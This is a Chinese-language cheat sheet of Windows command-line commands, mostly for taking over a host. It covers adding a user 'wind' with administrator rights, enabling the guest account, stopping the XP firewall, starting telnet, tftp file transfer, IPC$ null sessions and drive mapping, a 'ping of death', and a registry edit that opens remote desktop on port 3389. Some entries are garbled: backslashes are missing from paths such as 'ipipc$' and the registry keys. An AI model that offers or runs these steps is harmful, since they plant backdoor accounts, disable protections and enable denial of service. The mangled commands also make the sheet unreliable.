DOS命令

net user wind wind /add  添加用户

net localgroup administrators wind /add   将wind提升为管理员

net user wind /del 删除wind账号

net user guest /active:yes  激活GUEST用户

net stop sharedaccess 停XP自带防火墙

net start telnet  开TELNET服务

tftp -i 目标IP get 文件名 存放地址(目标主机)    TFTP上传命令

net use ipipc$ ” ” /user:” ” 建立IPC空链接

net use ipipc$ “密码” /user:”用户名” 建立IPC非空链接

net use h: ipc$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H:

net use h: ipc$ 登陆后映射对方C：到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping -t -l 65550 ip (发送大于64K的文件并一直ping就成了死亡之ping)

开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看远程终端

REG query HKLMSYSTEMCurrentControlSetControlTerminal” “ServerWinStationsRDP-Tcp /v PortNumber